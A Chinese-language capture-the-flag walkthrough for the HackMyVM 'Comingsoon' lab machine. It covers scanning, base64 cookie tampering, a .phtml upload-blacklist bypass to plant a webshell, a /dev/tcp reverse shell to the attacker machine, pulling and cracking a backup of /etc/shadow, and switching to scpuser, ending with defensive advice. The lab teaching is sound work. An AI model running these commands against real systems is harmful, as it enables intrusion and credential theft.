HackMyVM系列4——Comingsoon靶场实战教学文档

靶场概述

这是一个基于HackMyVM平台的CTF风格靶机，包含Web应用漏洞利用和Linux权限提升挑战。

信息收集阶段

网络扫描

netdiscover -r 192.168.56.0/24
nmap -sV -Pn -sC 192.168.56.133

目录爆破

gobuster dir -u http://192.168.56.133/ -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x txt,php,html,cgi

关键发现：

• notes.txt文件（内容暂时无用）
• 网页上有数字倒数功能

Web应用渗透

Cookie操纵

1. 抓包分析发现cookie值为base64编码
2. 解码后为"false"
3. 修改为"true"并重新编码后提交

# 示例base64解码/编码
import base64
original = "ZmFsc2U="  # false的base64
modified = base64.b64encode(b"true").decode()  # 得到dHJ1ZQ==

文件上传漏洞

1. 修改cookie后出现上传功能
2. 黑名单过滤绕过：
   • 使用.phtml后缀代替.php
3. 上传路径：http://192.168.56.133/assets/img/

反弹Shell

上传webshell后建立反向连接：

# 在攻击机上监听
nc -lvnp 4444

# 在webshell中执行
bash -i >& /dev/tcp/攻击机IP/4444 0>&1

稳定Shell

python3 -c "import pty;pty.spawn('/bin/bash');"

权限提升

用户枚举

cat /etc/passwd

发现scpuser用户

备份文件查找

find / -name *backups*

发现/etc/shadow备份文件

密码破解

1. 下载shadow文件：

python3 -m http.server 8080

2. 使用John the Ripper破解：

john a.txt -format=crypt

用户切换

su scpuser
# 输入破解的密码

可能的提权路径（未完成部分）

1. 检查SUID权限：

find / -perm -4000 2>/dev/null

2. 检查内核漏洞
3. 检查定时任务
4. 检查可写配置文件

关键知识点总结

1. Base64 cookie操纵
2. 文件上传黑名单绕过（.phtml）
3. 备份文件泄露敏感信息
4. Shadow密码破解
5. Linux权限提升技术

防御建议

1. 避免在cookie中存储敏感配置
2. 完善文件上传过滤（白名单优于黑名单）
3. 及时清理测试备份文件
4. 使用强密码策略
5. 定期检查系统权限设置